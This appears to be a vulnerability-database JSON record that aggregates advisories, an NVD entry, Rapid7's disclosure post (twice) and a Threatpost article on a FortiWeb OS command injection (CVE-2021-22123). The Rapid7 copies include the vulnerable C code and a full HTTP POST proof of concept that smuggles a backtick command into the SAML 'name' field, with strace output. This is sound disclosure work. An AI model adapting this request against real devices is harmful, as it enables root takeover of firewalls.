{"fortinet": [{"lastseen": "2022-04-28T11:34:53", "description": "An OS command injection vulnerability in FortiWeb's management interface may allow a remote authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-01T00:00:00", "type": "fortinet", "title": "FortiWeb - OS command injection vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22123"], "modified": "2021-06-01T00:00:00", "id": "FG-IR-20-120", "href": "https://www.fortiguard.com/psirt/FG-IR-20-120", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T11:32:06", "description": "An OS command injection vulnerability in FortiWeb's management interface may allow a remote authenticated administrator to execute arbitrary commands on the system via the SAML server configuration page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-18T00:00:00", "type": "fortinet", "title": "FortiWeb - OS command injection vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22123"], "modified": "2021-08-18T00:00:00", "id": "FG-IR-21-116", "href": "https://www.fortiguard.com/psirt/FG-IR-21-116", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T13:59:24", "description": "An OS command injection vulnerability in FortiWeb's management interface 6.3.7 and below, 6.2.3 and below, 6.1.x, 6.0.x, 5.9.x may allow a remote authenticated attacker to execute arbitrary commands on the system via the SAML server configuration page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-01T20:15:00", "type": "cve", "title": "CVE-2021-22123", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22123"], "modified": "2021-06-10T19:36:00", "cpe": [], "id": "CVE-2021-22123", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22123", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": []}], "rapid7blog": [{"lastseen": "2021-08-17T15:14:31", "description": "\n\nAn OS command injection vulnerability in FortiWeb's management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page. This is an instance of [ CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')](<https://cwe.mitre.org/data/definitions/78.html>) and has a CVSSv3 base score of [8.7](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N&version=3.1>). This vulnerability appears to be related to CVE-2021-22123, which was addressed in [FG-IR-20-120](<https://www.fortiguard.com/psirt/FG-IR-20-120>).\n\n## Product Description\n\nFortinet FortiWeb is a web application firewall (WAF), designed to catch both known and unknown exploits targeting the protected web applications before they have a chance to execute. More about FortiWeb can be found at [the vendor's website](<https://www.fortinet.com/products/web-application-firewall/fortiweb>).\n\n## Credit\n\nThis issue was discovered by researcher [William Vu](<https://twitter.com/wvuuuuuuuuuuuuu>) of Rapid7. 
It is being disclosed in accordance with Rapid7's [vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).\n\n## Exploitation\n\nAn attacker, who is first authenticated to the management interface of the FortiWeb device, can smuggle commands using backticks in the \"Name\" field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system. The affected code is noted below:\n \n \n int move_metafile(char *path,char *name)\n {\n int iVar1;\n char buf [512];\n int nret;\n snprintf(buf,0x200,\"%s/%s\",\"/data/etc/saml/shibboleth/service_providers\",name);\n iVar1 = access(buf,0);\n if (iVar1 != 0) {\n snprintf(buf,0x200,\"mkdir %s/%s\",\"/data/etc/saml/shibboleth/service_providers\",name);\n iVar1 = system(buf);\n if (iVar1 != 0) {\n return iVar1;\n }\n }\n snprintf(buf,0x200,\"cp %s %s/%s/%s.%s\",path,\"/data/etc/saml/shibboleth/service_providers\",name,\n \"Metadata\",&DAT_00212758);\n iVar1 = system(buf);\n return iVar1;\n }\n \n\nThe HTTP POST request and response below demonstrates an example exploit of this vulnerability:\n \n \n POST /api/v2.0/user/remoteserver.saml HTTP/1.1\n Host: [redacted]\n Cookie: [redacted]\n User-Agent: [redacted]\n Accept: application/json, text/plain, */*\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Referer: https://[redacted]/root/user/remote-user/saml-user/\n X-Csrftoken: 814940160\n Content-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412\n Content-Length: 3068\n Origin: https://[redacted]\n Dnt: 1\n Te: trailers\n Connection: close\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"q_type\"\n 1\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"name\"\n `touch /tmp/vulnerable`\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; 
name=\"entityID\"\n test\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"service-path\"\n /saml.sso\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"session-lifetime\"\n 8\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"session-timeout\"\n 30\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"sso-bind\"\n post\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"sso-bind_val\"\n 1\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"sso-path\"\n /SAML2/POST\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"slo-bind\"\n post\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"slo-bind_val\"\n 1\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"slo-path\"\n /SLO/POST\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"flag\"\n 0\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"enforce-signing\"\n disable\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"enforce-signing_val\"\n 0\n -----------------------------94351131111899571381631694412\n Content-Disposition: form-data; name=\"metafile\"; filename=\"test.xml\"\n Content-Type: text/xml\n <?xml version=\"1.0\"?>\n <md:EntityDescriptor xmlns:md=\"urn:oasis:names:tc:SAML:2.0:metadata\" validUntil=\"2021-06-12T16:54:31Z\" cacheDuration=\"PT1623948871S\" entityID=\"test\">\n <md:IDPSSODescriptor WantAuthnRequestsSigned=\"false\" protocolSupportEnumeration=\"urn:oasis:names:tc:SAML:2.0:protocol\">\n 
<md:KeyDescriptor use=\"signing\">\n <ds:KeyInfo xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n <ds:X509Data>\n <ds:X509Certificate>test</ds:X509Certificate>\n </ds:X509Data>\n </ds:KeyInfo>\n </md:KeyDescriptor>\n <md:KeyDescriptor use=\"encryption\">\n <ds:KeyInfo xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n <ds:X509Data>\n <ds:X509Certificate>test</ds:X509Certificate>\n </ds:X509Data>\n </ds:KeyInfo>\n </md:KeyDescriptor>\n <md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>\n <md:SingleSignOnService Binding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect\" Location=\"test\"/>\n </md:IDPSSODescriptor>\n </md:EntityDescriptor>\n -----------------------------94351131111899571381631694412--\n HTTP/1.1 500 Internal Server Error\n Date: Thu, 10 Jun 2021 11:59:45 GMT\n Cache-Control: no-cache, no-store, must-revalidate\n Pragma: no-cache\n Set-Cookie: [redacted]\n X-Frame-Options: SAMEORIGIN\n X-XSS-Protection: 1; mode=block\n Content-Security-Policy: frame-ancestors 'self'\n X-Content-Type-Options: nosniff\n Content-Length: 20\n Strict-Transport-Security: max-age=63072000\n Connection: close\n Content-Type: application/json\n {\"errcode\": \"-651\"}\n \n\nNote the smuggled 'touch' command is concatenated in the mkdir shell command:\n \n \n [pid 12867] execve(\"/migadmin/cgi-bin/fwbcgi\", [\"/migadmin/cgi-bin/fwbcgi\"], 0x55bb0395bf00 /* 42 vars */) = 0\n [pid 13934] execve(\"/bin/sh\", [\"sh\", \"-c\", \"mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`\"], 0x7fff56b1c608 /* 42 vars */) = 0\n [pid 13935] execve(\"/bin/touch\", [\"touch\", \"/tmp/vulnerable\"], 0x55774aa30bf8 /* 44 vars */) = 0\n [pid 13936] execve(\"/bin/mkdir\", [\"mkdir\", \"/data/etc/saml/shibboleth/service_providers/\"], 0x55774aa30be8 /* 44 vars */) = 0\n \n\nFinally, the results of the 'touch' command can be seen on the local command line of the FortiWeb device:\n \n \n /# ls -l /tmp/vulnerable\n -rw-r--r-- 1 root 0 0 
Jun 10 11:59 /tmp/vulnerable\n /#\n \n\n## Impact\n\nAn attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges. They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ. Note, though, Rapid7 researchers were only able to identify less than three hundred total of these devices that appear to be exposing their management interfaces to the general internet.\n\nNote that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication bypass issue, such as [CVE-2020-29015](<https://attackerkb.com/topics/n8OdPI11Nx/cve-2020-29015>).\n\n## Remediation\n\nIn the absence of a patch, users are advised to disable the FortiWeb device's management interface from untrusted networks, which would include the internet. 
Generally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway \u2014 instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.\n\n## Disclosure Timeline\n\n * June, 2021: Issue discovered and validated by William Vu of Rapid7\n * Thu, Jun 10, 2021: Initial disclosure to the vendor via their [PSIRT Contact Form](<https://www.fortiguard.com/faq/psirt-contact>)\n * Fri, Jun 11, 2021: Acknowledged by the vendor (ticket 132097)\n * Wed, Aug 11, 2021: Follow up with the vendor\n * Tue, Aug 17, 2021: Public disclosure via [this post](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>)\n * Tue, Aug 17, 2021: Vendor indicated that Fortiweb 6.4.1 is expected to include a fix, and will be released at the end of August", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-17T13:58:19", "type": "rapid7blog", "title": "Fortinet FortiWeb OS Command Injection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 
10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-17T13:58:19", "id": "RAPID7BLOG:9511625276530FB6A6D0D99D27559BAB", "href": "https://blog.rapid7.com/2021/08/17/fortinet-fortiweb-os-command-injection/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-08-20T03:36:27", "description": "# Fortinet FortiWeb OS Command Injection\n\n * Aug 17, 2021\n\nAn OS command injection vulnerability in FortiWeb's management interface\n(version 6.3.11 and prior) can allow a remote, authenticated attacker to\nexecute arbitrary commands on the system, via the SAML server configuration\npage. This is an instance of [ CWE-78: Improper Neutralization of Special\nElements used in an OS Command ('OS Command\nInjection')](https://cwe.mitre.org/data/definitions/78.html) and has a CVSSv3\nbase score of [8.7](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N&version=3.1).\nThis vulnerability appears to be related to CVE-2021-22123, which was\naddressed in [FG-IR-20-120](https://www.fortiguard.com/psirt/FG-IR-20-120).\n\n## Product Description\n\nFortinet FortiWeb is a web application firewall (WAF), designed to catch both\nknown and unknown exploits targeting the protected web applications before\nthey have a chance to execute. More about FortiWeb can be found at [the\nvendor's website](https://www.fortinet.com/products/web-application-firewall/fortiweb).\n\n## Credit\n\nThis issue was discovered by researcher [William\nVu](https://twitter.com/wvuuuuuuuuuuuuu) of Rapid7. It is being disclosed in\naccordance with Rapid7's [vulnerability disclosure\npolicy](https://www.rapid7.com/disclosure/).\n\n## Exploitation\n\nAn attacker, who is first authenticated to the management interface of the\nFortiWeb device, can smuggle commands using backticks in the \"Name\" field of\nthe SAML Server configuration page. 
These commands are then executed as the\nroot user of the underlying operating system. The affected code is noted\nbelow:\n\n```\nint move_metafile(char *path,char *name)\n{\nint iVar1;\nchar buf [512];\nint nret;\nsnprintf(buf,0x200,\"%s/%s\",\"/data/etc/saml/shibboleth/service_providers\",name);\niVar1 = access(buf,0);\nif (iVar1 != 0) {\nsnprintf(buf,0x200,\"mkdir %s/%s\",\"/data/etc/saml/shibboleth/service_providers\",name);\niVar1 = system(buf);\nif (iVar1 != 0) {\nreturn iVar1;\n}\n}\nsnprintf(buf,0x200,\"cp %s %s/%s/%s.%s\",path,\"/data/etc/saml/shibboleth/service_providers\",name,\n\"Metadata\",&DAT_00212758);\niVar1 = system(buf);\nreturn iVar1;\n}\n```\n\n\n\nThe HTTP POST request and response below demonstrates an example exploit of this vulnerability:\n\n ```\nPOST /api/v2.0/user/remoteserver.saml HTTP/1.1\nHost: [redacted]\nCookie: [redacted]\nUser-Agent: [redacted]\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://[redacted]/root/user/remote-user/saml-user/\nX-Csrftoken: 814940160\nContent-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412\nContent-Length: 3068\nOrigin: https://[redacted]\nDnt: 1\nTe: trailers\nConnection: close\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"q_type\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"name\"\n`touch /tmp/vulnerable`\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"entityID\"\ntest\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"service-path\"\n/saml.sso\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"session-lifetime\"\n8\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; 
name=\"session-timeout\"\n30\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-bind\"\npost\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-bind_val\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"sso-path\"\n/SAML2/POST\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-bind\"\npost\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-bind_val\"\n1\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"slo-path\"\n/SLO/POST\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"flag\"\n0\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"enforce-signing\"\ndisable\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"enforce-signing_val\"\n0\n-----------------------------94351131111899571381631694412\nContent-Disposition: form-data; name=\"metafile\"; filename=\"test.xml\"\nContent-Type: text/xml\n<?xml version=\"1.0\"?>\n<md:EntityDescriptor xmlns:md=\"urn:oasis:names:tc:SAML:2.0:metadata\" validUntil=\"2021-06-12T16:54:31Z\" cacheDuration=\"PT1623948871S\" entityID=\"test\">\n<md:IDPSSODescriptor WantAuthnRequestsSigned=\"false\" protocolSupportEnumeration=\"urn:oasis:names:tc:SAML:2.0:protocol\">\n<md:KeyDescriptor use=\"signing\">\n<ds:KeyInfo xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n<ds:X509Data>\n<ds:X509Certificate>test</ds:X509Certificate>\n</ds:X509Data>\n</ds:KeyInfo>\n</md:KeyDescriptor>\n<md:KeyDescriptor use=\"encryption\">\n<ds:KeyInfo 
xmlns:ds=\"http://www.w3.org/2000/09/xmldsig#\">\n<ds:X509Data>\n<ds:X509Certificate>test</ds:X509Certificate>\n</ds:X509Data>\n</ds:KeyInfo>\n</md:KeyDescriptor>\n<md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>\n<md:SingleSignOnService Binding=\"urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect\" Location=\"test\"/>\n</md:IDPSSODescriptor>\n</md:EntityDescriptor>\n-----------------------------94351131111899571381631694412--\nHTTP/1.1 500 Internal Server Error\nDate: Thu, 10 Jun 2021 11:59:45 GMT\nCache-Control: no-cache, no-store, must-revalidate\nPragma: no-cache\nSet-Cookie: [redacted]\nX-Frame-Options: SAMEORIGIN\nX-XSS-Protection: 1; mode=block\nContent-Security-Policy: frame-ancestors 'self'\nX-Content-Type-Options: nosniff\nContent-Length: 20\nStrict-Transport-Security: max-age=63072000\nConnection: close\nContent-Type: application/json\n{\"errcode\": \"-651\"}\n ```\n\n\n\n\nNote the smuggled 'touch' command is concatenated in the mkdir shell command:\n\n```\n[pid 12867] execve(\"/migadmin/cgi-bin/fwbcgi\", [\"/migadmin/cgi-bin/fwbcgi\"], 0x55bb0395bf00 /* 42 vars */) = 0\n[pid 13934] execve(\"/bin/sh\", [\"sh\", \"-c\", \"mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`\"], 0x7fff56b1c608 /* 42 vars */) = 0\n[pid 13935] execve(\"/bin/touch\", [\"touch\", \"/tmp/vulnerable\"], 0x55774aa30bf8 /* 44 vars */) = 0\n[pid 13936] execve(\"/bin/mkdir\", [\"mkdir\", \"/data/etc/saml/shibboleth/service_providers/\"], 0x55774aa30be8 /* 44 vars */) = 0\n```\n\n\n\n\nFinally, the results of the 'touch' command can be seen on the local command\nline of the FortiWeb device:\n\n```\n/# ls -l /tmp/vulnerable\n-rw-r--r-- 1 root 0 0 Jun 10 11:59 /tmp/vulnerable\n/#\n```\n\n\n\n\n## Impact\n\nAn attacker can leverage this vulnerability to take complete control of the\naffected device, with the highest possible privileges. 
They might install a\npersistent shell, crypto mining software, or other malicious software. In the\nunlikely event the management interface is exposed to the internet, they could\nuse the compromised platform to reach into the affected network beyond the\nDMZ. Note, though, Rapid7 researchers were only able to identify less than\nthree hundred total of these devices that appear to be exposing their\nmanagement interfaces to the general internet.\n\nNote that while authentication is a prerequisite for this exploit, this\nvulnerability could be combined with another authentication bypass issue, such\nas [CVE-2020-29015](https://attackerkb.com/topics/n8OdPI11Nx/cve-2020-29015).\n\n## Remediation\n\nIn the absence of a patch, users are advised to disable the FortiWeb device's\nmanagement interface from untrusted networks, which would include the\ninternet. Generally speaking, management interfaces for devices like FortiWeb\nshould not be exposed directly to the internet anyway -- instead, they should\nbe reachable only via trusted, internal networks, or over a secure VPN\nconnection.\n\n## Disclosure Timeline\n\n * June, 2021: Issue discovered and validated by William Vu of Rapid7\n * Thu, Jun 10, 2021: Initial disclosure to the vendor via their [PSIRT Contact Form](https://www.fortiguard.com/faq/psirt-contact)\n * Fri, Jun 11, 2021: Acknowledged by the vendor (ticket 132097)\n * Wed, Aug 11, 2021: Follow up with the vendor\n * Tue, Aug 17, 2021: Public disclosure via [this post](https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/)\n * Tue, Aug 17, 2021: Vendor indicated that Fortiweb 6.4.1 is expected to include a fix, and will be released at the end of August", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, 
"privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-19T00:00:00", "type": "seebug", "title": "Fortinet FortiWeb \u6388\u6743\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2021-22123\uff09", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29015", "CVE-2021-22123"], "modified": "2021-08-19T00:00:00", "id": "SSV:99335", "href": "https://www.seebug.org/vuldb/ssvid-99335", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-08-18T20:47:20", "description": "UPDATE\n\nAn unpatched OS command-injection security vulnerability has been disclosed in Fortinet\u2019s web application firewall (WAF) platform, known as FortiWeb. It could allow privilege escalation and full device takeover, researchers said.\n\nFortiWeb is a cybersecurity defense platform, [aimed at](<https://www.fortinet.com/products/web-application-firewall/fortiweb>) protecting business-critical web applications from attacks that target known and unknown vulnerabilities. The firewall has been to keep up with the deployment of new or updated features, or the addition of new web APIs, according to Fortinet.\n\nThe bug (CVE pending) exists in FortiWeb\u2019s management interface (version 6.3.11 and prior), and carries a CVSSv3 base score of 8.7 out of 10, making it high-severity. 
It can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page, according to Rapid7 researcher William Vu who discovered the bug.\n\n\u201cNote that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication-bypass issue, such as [CVE-2020-29015](<https://www.fortiguard.com/psirt/FG-IR-20-124>),\u201d according to a [Tuesday writeup](<https://www.rapid7.com/blog/post/2021/08/17/fortinet-fortiweb-os-command-injection/>) on the issue.\n\nOnce attackers are authenticated to the management interface of the FortiWeb device, they can smuggle commands using backticks in the \u201cName\u201d field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system.\n\n\u201cAn attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges,\u201d according to the writeup. \u201cThey might install a persistent shell, crypto mining software, or other malicious software.\u201d\n\nThe damage could be worse if the management interface is exposed to the internet: Rapid7 noted that attackers could pivot to the wider network in that case. 
However, Rapid7 researchers identified less than three hundred appliances that appeared to be doing so.\n\nIn the analysis, Vu provided a proof-of-concept exploit code, which uses an HTTP POST request and response.\n\nIn light of the disclosure, Fortinet has sped up plans to release a fix for the problem with FortiWeb 6.4.1 \u2014 originally planned for the end of August, it will now be available by the end of the week.\n\n\u201cWe are working to deliver immediate notification of a workaround to customers and a patch released by the end of the week,\u201d it said in a statement provided to Threatpost.\n\nThe firm also noted that Rapid7\u2019s disclosure was a bit of a surprise given [vulnerability-disclosure norms](<https://threatpost.com/giggle-managing-expectations-vulnerability-disclosure/159039/>) in the industry.\n\n\u201cThe security of our customers is always our first priority. Fortinet recognizes the important role of independent security researchers who work closely with vendors to protect the cybersecurity ecosystem in alignment with their responsible disclosure policies. In addition to directly communicating with researchers, our disclosure policy is clearly outlined on the [Fortinet PSIRT Policy page](<https://www.fortiguard.com/psirt_policy>), which includes asking incident submitters to maintain strict confidentiality until complete resolutions are available for customers. As such, we had expected that Rapid7 hold any findings prior to the end of the our [90-day Responsible disclosure window](<https://www.fortiguard.com/zeroday/responsible-disclosure>). We regret that in this instance, individual research was fully disclosed without adequate notification prior to the 90-day window.\u201d\n\nFor now, Rapid7 offered straightforward advice:\n\n\u201cIn the absence of a patch, users are advised to disable the FortiWeb device\u2019s management interface from untrusted networks, which would include the internet,\u201d according to Rapid7. 
\u201cGenerally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway \u2014 instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.\u201d\n\nThe Rapid7 researchers said that the vulnerability appears to be related to [CVE-2021-22123](<https://www.fortiguard.com/psirt/FG-IR-20-120>), which was patched in June.\n\n## **Fortinet: Popular for Exploit**\n\nThe vendor [is no stranger](<https://threatpost.com/fortigate-vpn-default-config-mitm-attacks/159586/>) to cybersecurity bugs in its platforms, and Fortinet\u2019s cybersecurity products are popular as exploitation avenues with cyberattackers, including nation-state actors. Users should prepare to patch quickly.\n\nIn April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) various advanced persistent threats (APTs) were actively exploiting three security vulnerabilities in the Fortinet SSL VPN for espionage. Exploits for CVE-2018-13379, CVE-2019-5591 and CVE-2020-12812 were being used to gain a foothold within networks before moving laterally and carrying out recon, they warned.\n\nOne of those bugs, a Fortinet vulnerability in FortiOS, [was also seen](<https://threatpost.com/hackers-exploit-flaw-cring-ransomware/165300/>) being used to deliver a new ransomware strain, dubbed Cring, that is targeting industrial enterprises across Europe.\n\n_**This post was updated August 18 at 1:30 p.m. 
ET with a statement from Fortinet.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-18T12:07:33", "type": "threatpost", "title": "Unpatched Fortinet Bug Allows Firewall Takeovers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, 